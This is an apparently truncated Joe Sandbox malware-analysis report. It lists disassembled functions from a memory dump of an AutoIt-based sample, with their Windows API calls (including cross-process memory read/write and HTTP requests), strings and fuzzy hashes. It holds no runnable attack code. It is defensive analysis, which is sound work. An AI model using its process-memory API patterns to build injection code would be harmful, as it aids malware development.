                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 839392675-0
                                                                                                                      • Opcode ID: 6fcc6d5189c0e0d08b2b4d401bc9a235ac76388179df9628a8016c50df78a5f1
                                                                                                                      • Instruction ID: e6189253590d98f43191221b8aa65c426c190341b9e18ca79cfdbca1ffb496a1
                                                                                                                      • Opcode Fuzzy Hash: 6fcc6d5189c0e0d08b2b4d401bc9a235ac76388179df9628a8016c50df78a5f1
                                                                                                                      • Instruction Fuzzy Hash: F8F03072B40158BBE73157529D0EEEF7A7CDFD6B55F400168F605D1090DBA06A02C6B9
                                                                                                                      Function 003EA31D Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • InterlockedExchange.KERNEL32(?,?), ref: 003EA330
                                                                                                                      • RtlEnterCriticalSection.NTDLL(?), ref: 003EA341
                                                                                                                      • TerminateThread.KERNEL32(?,000001F6,?,?,?,004166D3,?,?,?,?,?,003AE681), ref: 003EA34E
                                                                                                                      • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,004166D3,?,?,?,?,?,003AE681), ref: 003EA35B
                                                                                                                        • Part of subcall function 003E9CCE: CloseHandle.KERNEL32(?,?,003EA368,?,?,?,004166D3,?,?,?,?,?,003AE681), ref: 003E9CD8
                                                                                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 003EA36E
                                                                                                                      • RtlLeaveCriticalSection.NTDLL(?), ref: 003EA375
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3495660284-0
                                                                                                                      • Opcode ID: 1ea09ff59d8fe57d73058403fa5e1391ca4ff5c5662939dfb0fef6a4f7522741
                                                                                                                      • Instruction ID: e25454e07a779dc8ca92f3ad7ff1c7fd41de25e9a24f6dce4d5220792d8a4d22
                                                                                                                      • Opcode Fuzzy Hash: 1ea09ff59d8fe57d73058403fa5e1391ca4ff5c5662939dfb0fef6a4f7522741
                                                                                                                      • Instruction Fuzzy Hash: DFF0E232A40211EBD3222B64EC4CEDB7B79FF89302F800171F203910A0CBB0A802CB64
                                                                                                                      Function 003AC320 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 259fileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memmove.LIBCMT ref: 003AC419
                                                                                                                      • ReadFile.KERNEL32(?,?,00010000,?,00000000,?,?,00000000,?,003E6653,?,?,00000000), ref: 003AC495
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileRead_memmove
                                                                                                                      • String ID: Sf>
                                                                                                                      • API String ID: 1325644223-1669175409
                                                                                                                      • Opcode ID: 5d7669b4d743656642dfda1ed1b411446ab5022f2ead01e520bb0db286c85ad8
                                                                                                                      • Instruction ID: c1cfca180ae871f90d640c24b998b55ba58d93609ea4c1dbf79fb5ff3fff3d35
                                                                                                                      • Opcode Fuzzy Hash: 5d7669b4d743656642dfda1ed1b411446ab5022f2ead01e520bb0db286c85ad8
                                                                                                                      • Instruction Fuzzy Hash: 1BA1D034A04609EBDF02CF66C984BA9FBB4FF06300F14C196E865DB291D739D961CB95
                                                                                                                      Function 003BD7C7 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003C010A: std::exception::exception.LIBCMT ref: 003C013E
                                                                                                                        • Part of subcall function 003C010A: __CxxThrowException@8.LIBCMT ref: 003C0153
                                                                                                                        • Part of subcall function 003ACAEE: _memmove.LIBCMT ref: 003ACB2F
                                                                                                                        • Part of subcall function 003ABBD9: _memmove.LIBCMT ref: 003ABC33
                                                                                                                      • __swprintf.LIBCMT ref: 003BD98F
                                                                                                                      Strings
                                                                                                                      • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 003BD832
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                                                      • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                      • API String ID: 1943609520-557222456
                                                                                                                      • Opcode ID: b489e22f6ae719f10cf58615676eff52421e03e3f2e5327bbda18e0109afc5be
                                                                                                                      • Instruction ID: 2e50ace5d250460711ce5401f14c3ad38d694ee365b2d2acc9b7e59bfd2305c9
                                                                                                                      • Opcode Fuzzy Hash: b489e22f6ae719f10cf58615676eff52421e03e3f2e5327bbda18e0109afc5be
                                                                                                                      • Instruction Fuzzy Hash: E6917A715082019FC716EF24C885DAFBBA4FF86704F00496EF5969B2A1EB34ED44CB56
                                                                                                                      Function 003FB482 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • VariantInit.OLEAUT32(?), ref: 003FB4A8
                                                                                                                      • CharUpperBuffW.USER32(?,?), ref: 003FB5B7
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 003FB73A
                                                                                                                        • Part of subcall function 003EA6F6: VariantInit.OLEAUT32(00000000), ref: 003EA736
                                                                                                                        • Part of subcall function 003EA6F6: VariantCopy.OLEAUT32(?,?), ref: 003EA73F
                                                                                                                        • Part of subcall function 003EA6F6: VariantClear.OLEAUT32(?), ref: 003EA74B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                      • API String ID: 4237274167-1221869570
                                                                                                                      • Opcode ID: d6a1caae4daf4c83e4b3fa7c39cd1485676093ae32452d0867fe7f6927abbacd
                                                                                                                      • Instruction ID: a84404c76130bc395417d7989af60125369536352333ffa2dca7d004bef13c9a
                                                                                                                      • Opcode Fuzzy Hash: d6a1caae4daf4c83e4b3fa7c39cd1485676093ae32452d0867fe7f6927abbacd
                                                                                                                      • Instruction Fuzzy Hash: 9E918B746083059FCB11EF24C48196AF7E8EF89714F14496EF98ACB362DB30E945CB52
                                                                                                                      Function 0040C2E7 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 137COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0040C354
                                                                                                                      • ScreenToClient.USER32(?,00000002), ref: 0040C384
                                                                                                                      • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 0040C3EA
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$ClientMoveRectScreen
                                                                                                                      • String ID: @U=u
                                                                                                                      • API String ID: 3880355969-2594219639
                                                                                                                      • Opcode ID: bb8df5453cb1f7297fc1b9451448214844bf8885daba51c4d2ae5711cada5c48
                                                                                                                      • Instruction ID: 3db5038a5f01cd0f380160cee5382ab81b26c09d940a4d140a18ce91c34b1258
                                                                                                                      • Opcode Fuzzy Hash: bb8df5453cb1f7297fc1b9451448214844bf8885daba51c4d2ae5711cada5c48
                                                                                                                      • Instruction Fuzzy Hash: 7A516231900204EFCF20DF68C8C0AAE7BB6FB45364F14866AF915EB291D7749D41CB54
                                                                                                                      Function 003DD206 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 130windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 003DD258
                                                                                                                      • __itow.LIBCMT ref: 003DD292
                                                                                                                        • Part of subcall function 003DD4DE: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 003DD549
                                                                                                                      • SendMessageW.USER32(?,0000110A,00000001,?), ref: 003DD2FB
                                                                                                                      • __itow.LIBCMT ref: 003DD350
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$__itow
                                                                                                                      • String ID: @U=u
                                                                                                                      • API String ID: 3379773720-2594219639
                                                                                                                      • Opcode ID: 6ab6a5f86add8a67c297725f22c76395f36fd95a76cc2ce06ea20626e4817960
                                                                                                                      • Instruction ID: 52dc5c2fc0ce2c739942e434e43a7ae8fe65900c353191596f5e981251520955
                                                                                                                      • Opcode Fuzzy Hash: 6ab6a5f86add8a67c297725f22c76395f36fd95a76cc2ce06ea20626e4817960
                                                                                                                      • Instruction Fuzzy Hash: 78417276A00609ABDF16DF94DC42FEE7BB9EF49710F00001AFA05A7291DB749A45CB52
                                                                                                                      Function 003DCF7F Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 121windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003E4D41: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,003DC9FE,?,?,00000034,00000800,?,00000034), ref: 003E4D6B
                                                                                                                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 003DCFC9
                                                                                                                        • Part of subcall function 003E4D0C: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,003DCA2D,?,?,00000800,?,00001073,00000000,?,?), ref: 003E4D36
                                                                                                                        • Part of subcall function 003E4C65: GetWindowThreadProcessId.USER32(?,?), ref: 003E4C90
                                                                                                                        • Part of subcall function 003E4C65: OpenProcess.KERNEL32(00000438,00000000,?,?,?,003DC9C2,00000034,?,?,00001004,00000000,00000000), ref: 003E4CA0
                                                                                                                        • Part of subcall function 003E4C65: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,003DC9C2,00000034,?,?,00001004,00000000,00000000), ref: 003E4CB6
                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 003DD036
                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 003DD083
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                      • String ID: @$@U=u
                                                                                                                      • API String ID: 4150878124-826235744
                                                                                                                      • Opcode ID: f7471faafb62fa9fa4b99cc4cfd5d1836bf0e98f285e179bb2572a42d9d6a790
                                                                                                                      • Instruction ID: 17ed311b05197ba941626d84e06ed067cc21137668a996b464c5b5fad06c6a97
                                                                                                                      • Opcode Fuzzy Hash: f7471faafb62fa9fa4b99cc4cfd5d1836bf0e98f285e179bb2572a42d9d6a790
                                                                                                                      • Instruction Fuzzy Hash: 51412A72900228AFDB11DFA4DD85FDEBBB8EF49700F108195EA45BB181DA706E45CBA1
                                                                                                                      Function 003E1050 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 003E10B8
                                                                                                                      • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 003E10EE
                                                                                                                      • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 003E10FF
                                                                                                                      • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 003E1181
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                      • String ID: DllGetClassObject
                                                                                                                      • API String ID: 753597075-1075368562
                                                                                                                      • Opcode ID: 2c20fd7764ff4a63e0a37f20425628343d7b9027f8a4232f29c41a631ca704a5
                                                                                                                      • Instruction ID: 568bcd4c5d34cfcda138588d5f11a103b9795b2bb2c8fad7d0d936f8f147d70f
                                                                                                                      • Opcode Fuzzy Hash: 2c20fd7764ff4a63e0a37f20425628343d7b9027f8a4232f29c41a631ca704a5
                                                                                                                      • Instruction Fuzzy Hash: E64190B2600214EFCB12CF55CC84B9A7BA9EF44350F1081ADEA05DF289D7B4DD44CBA0
                                                                                                                      Function 003E5A25 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 003E5A93
                                                                                                                      • GetMenuItemInfoW.USER32 ref: 003E5AAF
                                                                                                                      • DeleteMenu.USER32(00000004,00000007,00000000), ref: 003E5AF5
                                                                                                                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,004618F0,00000000), ref: 003E5B3E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Menu$Delete$InfoItem_memset
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 1173514356-4108050209
                                                                                                                      • Opcode ID: 4c2c000d896dd1b4c7606f22bd40919932e418da064f6bc53a9e085cffcc585d
                                                                                                                      • Instruction ID: 3c9b4e982dd475f57d41dcc85a418b1f543ed868af86a028248c221fb3eff694
                                                                                                                      • Opcode Fuzzy Hash: 4c2c000d896dd1b4c7606f22bd40919932e418da064f6bc53a9e085cffcc585d
                                                                                                                      • Instruction Fuzzy Hash: DB41B231204792AFDB22DF25C880B5AB7E4EF85318F05472DF9559B2D1D7B0E800CB66
                                                                                                                      Function 0040B354 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0040B3E1
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InvalidateRect
                                                                                                                      • String ID: @U=u
                                                                                                                      • API String ID: 634782764-2594219639
                                                                                                                      • Opcode ID: e936e5530d14fdaa9712085faa86753df1510f416102b9711794a4de442d31fc
                                                                                                                      • Instruction ID: b2e9636ede9ab4cb22c89da1e54dbd66aa586c8a2111a4766edc9679b1f5a1a0
                                                                                                                      • Opcode Fuzzy Hash: e936e5530d14fdaa9712085faa86753df1510f416102b9711794a4de442d31fc
                                                                                                                      • Instruction Fuzzy Hash: 2531BE34A00204ABEB349F588C85FA93765EB05350F648533FA51E62E2C7389A419BDE
                                                                                                                      Function 00400458 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CharLowerBuffW.USER32(?,?,?,?), ref: 00400478
                                                                                                                        • Part of subcall function 003A7F40: _memmove.LIBCMT ref: 003A7F8F
                                                                                                                        • Part of subcall function 003AA2FB: _memmove.LIBCMT ref: 003AA33D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove$BuffCharLower
                                                                                                                      • String ID: cdecl$none$stdcall$winapi
                                                                                                                      • API String ID: 2411302734-567219261
                                                                                                                      • Opcode ID: 16a3d27384530f4d853cf04e4d4281a589cf61414fefb3130c5b0f025104e534
                                                                                                                      • Instruction ID: 926dcca73ab602c673b42c684c6f6797af26f70eb53db69558bcdb494eb568a7
                                                                                                                      • Opcode Fuzzy Hash: 16a3d27384530f4d853cf04e4d4281a589cf61414fefb3130c5b0f025104e534
                                                                                                                      • Instruction Fuzzy Hash: B631D031500619AFCF01EF58CC40AEEB3B4FF45324F108A2AE962AB6D6DB35E905CB44
                                                                                                                      Function 003F4A41 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 003F4A60
                                                                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003F4A86
                                                                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 003F4AB6
                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 003F4AFD
                                                                                                                        • Part of subcall function 003F56A9: GetLastError.KERNEL32(?,?,003F4A2B,00000000,00000000,00000001), ref: 003F56BE
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
